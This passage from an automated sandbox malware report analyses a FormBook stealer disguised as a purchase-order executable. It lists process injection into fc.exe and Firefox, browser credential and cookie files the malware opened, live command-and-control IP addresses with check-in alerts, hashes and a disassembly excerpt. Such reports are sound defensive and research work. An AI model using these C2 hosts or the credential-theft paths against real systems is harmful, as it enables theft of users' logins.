                NtNotifyChangeKey: Direct from: 0x76EF3C2C
                NtCreateMutant: Direct from: 0x76EF35CC
                NtResumeThread: Direct from: 0x76EF36AC
                NtMapViewOfSection: Direct from: 0x76EF2D1C
                NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                NtQuerySystemInformation: Direct from: 0x76EF2DFC
                NtReadFile: Direct from: 0x76EF2ADC
                NtDelayExecution: Direct from: 0x76EF2DDC
                NtQueryInformationProcess: Direct from: 0x76EF2C26
                NtResumeThread: Direct from: 0x76EF2FBC
                NtCreateUserProcess: Direct from: 0x76EF371C
                NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                NtSetInformationThread: Direct from: 0x76EE63F9
                NtWriteVirtualMemory: Direct from: 0x76EF490C
                NtClose: Direct from: 0x76EF2B6C
                NtSetInformationThread: Direct from: 0x76EF2B4C
                NtCreateKey: Direct from: 0x76EF2C6C
                NtReadVirtualMemory: Direct from: 0x76EF2E8C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe | Section loaded: NULL target: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe | Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe protection: read write
              Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\fc.exe | Thread register set: target process: 6976
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe | Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3920201965.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, DlLArodfwUXcDj.exe, 00000003.00000000.2340711633.00000000016C1000.00000002.00000001.00040000.00000000.sdmp
                Binary or memory string: Program Manager
                Binary or memory string: Shell_TrayWnd
                Binary or memory string: Progman
                Binary or memory string: Progmanlock

              Stealing of Sensitive Information

              Source: Yara match | File source: 0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\fc.exe
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              Source: Yara match | File source: 0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 212 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 212 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 4 Obfuscated Files or Information | LSA Secrets | 12 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Source | Detection | Scanner | Label
              PO No. 0146850827805 HSP00598420.exe | 69% | Virustotal |
              PO No. 0146850827805 HSP00598420.exe | 68% | ReversingLabs | Win32.Backdoor.FormBook
              PO No. 0146850827805 HSP00598420.exe | 100% | Avira | HEUR/AGEN.1318544
              PO No. 0146850827805 HSP00598420.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1592547
                                                          Start date and time:2025-01-16 09:22:51 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 50s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:6
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:PO No. 0146850827805 HSP00598420.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@5/1@11/7
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 87%
                                                          • Number of executed functions: 14
                                                          • Number of non-executed functions: 329
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          No simulations
                                                          • 199.192.21.169
                                                          DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                                                          • 198.54.116.113
                                                          No context
                                                          No context
                                                          Process:C:\Windows\SysWOW64\fc.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.964802941579752
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:PO No. 0146850827805 HSP00598420.exe
                                                          File size:289'280 bytes
                                                          MD5:bd83674d593f0dbb40a73b74046e5e9c
                                                          SHA1:cd27963d0fee77c8defd60da3db84e271c6eba91
                                                          SHA256:544af6e22350e213364a80dda48697330f3fb55e542df51a0686a0e4861a8a2a
                                                          SHA512:bb6ba29646af4cb5b39990e8ae911ed4430ea0707fffabecc192f1c3da3e05c36319a8c414bd577936ae8b7342a79192645280b6914576ed3ace0e66fe74071a
                                                          SSDEEP:6144:C8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3ro:Q/dhQJqiOKsPDOZLGeDk3r
                                                          TLSH:D95422169F26F206C1FD2673351F4B42B675472DBEA52F21B4992CA28D90CBE5EC03B1
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0x401580
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:
                                                          Instruction
                                                          push ebp
                                                          push esp
                                                          pop ebp
                                                          sub esp, 00000424h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          push 0000040Ch
                                                          lea eax, dword ptr [ebp-00000420h]
                                                          push 00000000h
                                                          push eax
                                                          mov dword ptr [ebp-00000424h], 00000000h
                                                          call 00007F3F808D79BCh
                                                          add esp, 0Ch
                                                          xor ecx, ecx
                                                          xor edi, edi
                                                          sub esi, esi
                                                          mov dword ptr [ebp-14h], 00000054h
                                                          mov dword ptr [ebp-10h], 00003B15h
                                                          mov dword ptr [ebp-0Ch], 00001B0Dh
                                                          mov dword ptr [ebp-08h], 00004BD2h
                                                          pushad
                                                          popad
                                                          inc ecx
                                                          mov eax, ecx
                                                          and eax, 80000007h
                                                          jns 00007F3F808D5DC7h
                                                          dec eax
                                                          or eax, FFFFFFF8h
                                                          inc eax
                                                          jne 00007F3F808D5DC4h
                                                          add ecx, ecx
                                                          cmp ecx, 00000CB4h
                                                          jl 00007F3F808D5DA7h
                                                          mov ecx, 00006ACDh
                                                          mov eax, 92492493h
                                                          imul ecx
                                                          add edx, ecx
                                                          sar edx, 05h
                                                          push edx
                                                          pop ecx
                                                          shr ecx, 1Fh
                                                          add ecx, edx
                                                          jne 00007F3F808D5DADh
                                                          mov eax, 00001819h
                                                          nop
                                                          push 0000001Bh
                                                          nop
                                                          pop edx
                                                          mov ecx, 000000C2h
                                                          cmp ecx, edx
                                                          cmovl ecx, edx
                                                          dec eax
                                                          jne 00007F3F808D5DBAh
                                                          mov ecx, 00001F5Ah
                                                          mov eax, 82082083h
                                                          imul ecx
                                                          add edx, ecx
                                                          sar edx, 06h
                                                          push edx
                                                          pop ecx
                                                          shr ecx, 1Fh
                                                          add ecx, edx
                                                          jne 00007F3F808D5DADh
                                                          call 00007F3F808D7C1Ah
                                                          mov dword ptr [ebp-5Ch], eax
                                                          push ecx
                                                          pop ecx
                                                          inc edi
                                                          mov eax, 55555556h
                                                          imul edi
                                                          Programming Language:
                                                          • [C++] VS2012 build 50727
                                                          • [ASM] VS2012 build 50727
                                                          • [LNK] VS2012 build 50727
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x45694 | 0x45800 | a5cb6af814e316e7eba812a62386f963 | False | 0.9886114545863309 | data | 7.99527207662154 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-16T09:24:34.698021+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49915 | 47.83.1.90 | 80 | TCP
2025-01-16T09:24:34.698021+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49915 | 47.83.1.90 | 80 | TCP
2025-01-16T09:24:50.437047+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49975 | 84.32.84.32 | 80 | TCP
2025-01-16T09:24:53.123372+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49976 | 84.32.84.32 | 80 | TCP
2025-01-16T09:24:55.724590+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49977 | 84.32.84.32 | 80 | TCP
2025-01-16T09:24:58.544666+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49978 | 84.32.84.32 | 80 | TCP
2025-01-16T09:24:58.544666+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49978 | 84.32.84.32 | 80 | TCP
2025-01-16T09:25:04.279631+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49980 | 172.67.182.198 | 80 | TCP
2025-01-16T09:25:06.811625+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49981 | 172.67.182.198 | 80 | TCP
2025-01-16T09:25:09.399284+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49982 | 172.67.182.198 | 80 | TCP
2025-01-16T09:25:11.930780+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49983 | 172.67.182.198 | 80 | TCP
2025-01-16T09:25:11.930780+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49983 | 172.67.182.198 | 80 | TCP
2025-01-16T09:25:18.072833+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49984 | 134.122.133.80 | 80 | TCP
2025-01-16T09:25:20.608460+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49985 | 134.122.133.80 | 80 | TCP
2025-01-16T09:25:23.165366+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49986 | 134.122.133.80 | 80 | TCP
2025-01-16T09:25:25.734250+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49987 | 134.122.133.80 | 80 | TCP
2025-01-16T09:25:25.734250+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49987 | 134.122.133.80 | 80 | TCP
2025-01-16T09:25:31.377652+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49988 | 199.192.21.169 | 80 | TCP
2025-01-16T09:25:33.932220+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49989 | 199.192.21.169 | 80 | TCP
2025-01-16T09:25:36.462963+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49990 | 199.192.21.169 | 80 | TCP
2025-01-16T09:25:39.017009+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49991 | 199.192.21.169 | 80 | TCP
2025-01-16T09:25:39.017009+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49991 | 199.192.21.169 | 80 | TCP
2025-01-16T09:25:45.120603+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49992 | 154.197.162.239 | 80 | TCP
2025-01-16T09:25:47.652543+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49993 | 154.197.162.239 | 80 | TCP
2025-01-16T09:25:50.221410+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49994 | 154.197.162.239 | 80 | TCP
2025-01-16T09:25:52.795249+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49995 | 154.197.162.239 | 80 | TCP
2025-01-16T09:25:52.795249+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49995 | 154.197.162.239 | 80 | TCP
2025-01-16T09:26:07.657469+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49996 | 134.122.133.80 | 80 | TCP
2025-01-16T09:26:10.214881+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49997 | 134.122.133.80 | 80 | TCP
2025-01-16T09:26:12.769081+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49998 | 134.122.133.80 | 80 | TCP
2025-01-16T09:26:15.294725+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49999 | 134.122.133.80 | 80 | TCP
2025-01-16T09:26:15.294725+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49999 | 134.122.133.80 | 80 | TCP
2025-01-16T09:26:21.783376+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50000 | 47.83.1.90 | 80 | TCP
2025-01-16T09:26:24.351040+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 47.83.1.90 | 80 | TCP
2025-01-16T09:26:26.958056+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50002 | 47.83.1.90 | 80 | TCP
2025-01-16T09:26:29.598381+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50003 | 47.83.1.90 | 80 | TCP
2025-01-16T09:26:29.598381+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50003 | 47.83.1.90 | 80 | TCP
2025-01-16T09:26:35.237672+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50004 | 188.114.96.3 | 80 | TCP
2025-01-16T09:26:37.767417+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50005 | 188.114.96.3 | 80 | TCP
2025-01-16T09:26:40.317110+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50006 | 188.114.96.3 | 80 | TCP
2025-01-16T09:26:42.843250+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50007 | 188.114.96.3 | 80 | TCP
2025-01-16T09:26:42.843250+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50007 | 188.114.96.3 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Jan 16, 2025 09:25:08.699939966 CET4998280192.168.2.5172.67.182.198
                                                          Jan 16, 2025 09:25:08.704879999 CET8049982172.67.182.198192.168.2.5
                                                          Jan 16, 2025 09:25:08.705015898 CET8049982172.67.182.198192.168.2.5
                                                          Jan 16, 2025 09:25:09.398093939 CET8049982172.67.182.198192.168.2.5
                                                          Jan 16, 2025 09:25:09.399082899 CET8049982172.67.182.198192.168.2.5
                                                          Jan 16, 2025 09:25:09.399283886 CET4998280192.168.2.5172.67.182.198
                                                          Jan 16, 2025 09:25:10.210727930 CET4998280192.168.2.5172.67.182.198
                                                          Jan 16, 2025 09:25:11.227150917 CET4998380192.168.2.5172.67.182.198
                                                          Jan 16, 2025 09:25:11.232291937 CET8049983172.67.182.198192.168.2.5
                                                          Jan 16, 2025 09:25:11.232464075 CET4998380192.168.2.5172.67.182.198
                                                          Jan 16, 2025 09:25:11.242889881 CET4998380192.168.2.5172.67.182.198
                                                          Jan 16, 2025 09:25:11.247690916 CET8049983172.67.182.198192.168.2.5
                                                          Jan 16, 2025 09:25:11.930166006 CET8049983172.67.182.198192.168.2.5
                                                          Jan 16, 2025 09:25:11.930596113 CET8049983172.67.182.198192.168.2.5
                                                          Jan 16, 2025 09:25:11.930779934 CET4998380192.168.2.5172.67.182.198
                                                          Jan 16, 2025 09:25:11.933397055 CET4998380192.168.2.5172.67.182.198
                                                          Jan 16, 2025 09:25:11.938214064 CET8049983172.67.182.198192.168.2.5
                                                          Jan 16, 2025 09:25:17.189526081 CET4998480192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:17.194458008 CET8049984134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:17.194538116 CET4998480192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:17.210191965 CET4998480192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:17.215044022 CET8049984134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:18.072521925 CET8049984134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:18.072678089 CET8049984134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:18.072833061 CET4998480192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:18.723664045 CET4998480192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:19.741800070 CET4998580192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:19.746741056 CET8049985134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:19.746813059 CET4998580192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:19.759061098 CET4998580192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:19.764028072 CET8049985134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:20.608370066 CET8049985134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:20.608395100 CET8049985134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:20.608459949 CET4998580192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:21.270517111 CET4998580192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:22.298141003 CET4998680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:22.303363085 CET8049986134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:22.303642988 CET4998680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:22.321666956 CET4998680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:22.326719999 CET8049986134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:22.326869011 CET8049986134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:23.165278912 CET8049986134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:23.165297031 CET8049986134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:23.165365934 CET4998680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:23.832976103 CET4998680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:24.852114916 CET4998780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:24.856990099 CET8049987134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:24.857084990 CET4998780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:24.866805077 CET4998780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:24.871596098 CET8049987134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:25.734050035 CET8049987134.122.133.80192.168.2.5
